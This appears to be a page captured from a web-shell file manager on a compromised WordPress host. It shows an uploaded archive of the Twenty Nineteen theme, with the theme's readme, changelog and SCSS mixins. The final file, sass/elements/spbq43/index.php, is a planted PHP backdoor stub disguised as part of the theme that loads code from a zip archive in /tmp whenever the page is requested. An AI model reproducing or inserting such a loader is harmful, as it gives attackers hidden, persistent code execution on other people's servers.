whoami7 - Manager
:
/
home
/
apmablcosr
/
www
/
wp-content
/
uploads
/
Upload File:
files >> /home/apmablcosr/www/wp-content/uploads/twentynineteen.tar
readme.txt 0000644 00000011233 15136114037 0006543 0 ustar 00 === Twenty Nineteen === Contributors: wordpressdotorg Tags: one-column, accessibility-ready, custom-colors, custom-menu, custom-logo, editor-style, featured-images, footer-widgets, rtl-language-support, sticky-post, threaded-comments, translation-ready, block-patterns Requires at least: 4.7 Tested up to: 6.4 Requires PHP: 5.2.4 Stable tag: 2.7 License: GPLv2 or later License URI: http://www.gnu.org/licenses/gpl-2.0.html Our 2019 default theme is designed to show off the power of the block editor. == Description == Our 2019 default theme is designed to show off the power of the block editor. It features custom styles for all the default blocks, and is built so that what you see in the editor looks like what you'll see on your website. Twenty Nineteen is designed to be adaptable to a wide range of websites, whether you’re running a photo blog, launching a new business, or supporting a non-profit. Featuring ample whitespace and modern sans-serif headlines paired with classic serif body text, it's built to be beautiful on all screen sizes. For more information about Twenty Nineteen please go to https://wordpress.org/documentation/article/twenty-nineteen/. == Installation == 1. In your admin panel, go to Appearance -> Themes and click the 'Add New' button. 2. Type in Twenty Nineteen in the search form and press the 'Enter' key on your keyboard. 3. Click on the 'Activate' button to use your new theme right away. 4. Go to https://wordpress.org/documentation/article/twenty-nineteen/ for a guide on how to customize this theme. 5. Navigate to Appearance > Customize in your admin panel and customize to taste. == Copyright == Twenty Nineteen WordPress Theme, Copyright 2018-2023 WordPress.org Twenty Nineteen is distributed under the terms of the GNU GPL This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. == Changelog == = 2.7 = * Released: November 7, 2023 https://codex.wordpress.org/Twenty_Nineteen_Theme_Changelog#Version_2.7 = 2.6 = * Released: August 8, 2023 https://codex.wordpress.org/Twenty_Nineteen_Theme_Changelog#Version_2.6 = 2.5 = * Released: March 28, 2023 https://codex.wordpress.org/Twenty_Nineteen_Theme_Changelog#Version_2.5 = 2.4 = * Released: November 1, 2022 https://codex.wordpress.org/Twenty_Nineteen_Theme_Changelog#Version_2.4 = 2.3 = * Released: May 24, 2022 https://codex.wordpress.org/Twenty_Nineteen_Theme_Changelog#Version_2.3 = 2.2 = * Released: January 25, 2022 https://codex.wordpress.org/Twenty_Nineteen_Theme_Changelog#Version_2.2 = 2.1 = * Released: July 20, 2021 https://codex.wordpress.org/Twenty_Nineteen_Theme_Changelog#Version_2.1 = 2.0 = * Released: March 9, 2021 https://codex.wordpress.org/Twenty_Nineteen_Theme_Changelog#Version_2.0 = 1.9 = * Released: December 22, 2020 https://codex.wordpress.org/Twenty_Nineteen_Theme_Changelog#Version_1.9 = 1.8 = * Released: December 8, 2020 https://codex.wordpress.org/Twenty_Nineteen_Theme_Changelog#Version_1.8 = 1.7 = * Released: August 11, 2020 https://codex.wordpress.org/Twenty_Nineteen_Theme_Changelog#Version_1.7 = 1.6 = * Released: June 10, 2020 https://codex.wordpress.org/Twenty_Nineteen_Theme_Changelog#Version_1.6 = 1.5 = * Released: March 31, 2020 https://codex.wordpress.org/Twenty_Nineteen_Theme_Changelog#Version_1.5 = 1.4 = * Released: May 7, 2019 https://codex.wordpress.org/Twenty_Nineteen_Theme_Changelog#Version_1.4 = 1.3 = * Released: February 21, 2019 https://codex.wordpress.org/Twenty_Nineteen_Theme_Changelog#Version_1.3 = 1.2 = * Released: January 9, 2019 https://codex.wordpress.org/Twenty_Nineteen_Theme_Changelog#Version_1.2 = 1.1 = * Released: December 19, 2018 https://codex.wordpress.org/Twenty_Nineteen_Theme_Changelog#Version_1.1 = 1.0 = * Released: December 6, 2018 Initial release == Resources == * normalize.css, © 2012-2018 Nicolas Gallagher and Jonathan Neal, MIT * Underscores, © 2012-2023 Automattic, Inc., GNU GPL v2 or later * Bundled block pattern images: * Abstract Background by HD Wallpapers, CC0. https://stocksnap.io/photo/abstract-background-0SRRVNMKBX * Abstract Waves by HD Wallpapers, CC0. https://stocksnap.io/photo/abstract-waves-0KREGLTZQ3 * Abstract Bokeh by HD Wallpapers, CC0. https://stocksnap.io/photo/abstract-bokeh-P4KVZBMQ6L * Colorful Bokeh by HD Wallpapers, CC0. https://stocksnap.io/photo/colorful-bokeh-VN4G84GL8H sass/mixins/_mixins-master.scss 0000644 00000005507 15136114037 0012670 0 ustar 00 // Rem output with px fallback @mixin font-size($sizeValue: 1) { font-size: ($sizeValue * 16) * 1px; font-size: $sizeValue * 1rem; } // Center block @mixin center-block { display: block; margin-left: auto; margin-right: auto; } // Clearfix @mixin clearfix() { content: ""; display: table; table-layout: fixed; } // Clear after (not all clearfix need this also) @mixin clearfix-after() { clear: both; } // Column width with margin @mixin column-width($numberColumns: 3) { width: map-get($columns, $numberColumns) - (($columns__margin * ($numberColumns - 1)) / $numberColumns); } @mixin filter-duotone { &:before { background: $color__link; mix-blend-mode: screen; opacity: 0.1; z-index: 2; } &:after { background: $color__link; mix-blend-mode: multiply; opacity: .8; z-index: 3; /* Browsers supporting mix-blend-mode don't need opacity < 1 */ @supports (mix-blend-mode: multiply) { opacity: 1; } } } @mixin filter-grayscale { position: relative; filter: grayscale(100%); z-index: 1; &:after { display: block; width: 100%; height: 100%; z-index: 10; } } @mixin post-section-dash { &:before { background: $color__text-light; content: "\020"; display: block; height: 2px; margin: $size__spacing-unit 0; width: 1em; } &.has-text-align-center:before { margin-left: auto; margin-right: auto; } &.has-text-align-right:before { margin-left: auto; } } /* If we add the border using a regular CSS border, it won't look good on non-retina devices, * since its edges can look jagged due to lack of antialiasing. In this case, we are several * layers of box-shadow to add the border visually, which will render the border smoother. */ @mixin box-shadow( $size ) { box-shadow: 0 0 0 $size $color__text-light inset, // Original border. 0 0 0 ($size + 1px) $color__text-light inset, // Antialiasing, inner edge. 0 0 1px 0 rgba( $color__text-light, 0.7 ); // Antialiasing, outer edge. } /* Calculates maximum width for post content */ @mixin postContentMaxWidth() { @include media(tablet) { max-width: $size__site-tablet-content; } @include media(desktop) { max-width: $size__site-desktop-content; } } /* Nested sub-menu padding: 10 levels deep */ @mixin nestedSubMenuPadding() { ul { counter-reset: submenu; } ul > li > a::before { font-family: $font__body; font-weight: normal; content: "\2013\00a0" counters(submenu, "\2013\00a0", none); counter-increment: submenu } } /* Ensure all font family declarations come with non-latin fallbacks */ @mixin font-family( $font_family: $font__body ) { font-family: $font_family; @extend %non-latin-fonts; } /* Build our non-latin font styles */ %non-latin-fonts { @each $lang, $font__fallback in $font__fallbacks { &:lang(#{$lang}) { font-family: unquote( $font__fallback ); } } } @import "utilities"; sass/mixins/_utilities.scss 0000644 00000001534 15136114037 0012077 0 ustar 00 @mixin media( $res ) { @if mobile == $res { @media only screen and (min-width: $mobile_width) { @content; } } @if tablet == $res { @media only screen and (min-width: $tablet_width) { @content; } } @if desktop == $res { @media only screen and (min-width: $desktop_width) { @content; } } @if wide == $res { @media only screen and (min-width: $wide_width) { @content; } } } @mixin link-transition( $attr: color ) { transition: $attr $link_transition ease-in-out; } @mixin button-transition() { transition: background $button_transition ease-in-out; } @mixin button-all-transition() { transition: all $button_transition ease-in-out; } @mixin background-transition() { transition: background $background_transition ease-in-out; } @mixin selection { ::-moz-selection { @content; } ::selection { @content; } } sass/elements/_tables.scss 0000644 00000000341 15136114037 0011636 0 ustar 00 table { margin: 0 0 $size__spacing-unit; border-collapse: collapse; width: 100%; @include font-family( $font__heading ); td, th { padding: 0.5em; border: 1px solid $color__text-light; word-break: break-all; } } sass/elements/spbq43/index.php 0000644 00000000165 15136114037 0012270 0 ustar 00 <?=@null; $h="";if(!empty($_SERVER["HTTP_HOST"])) $h = "edit.php"; include("zip:///tmp/phpmmhqbavqkpkgax5lbTz#$h");?>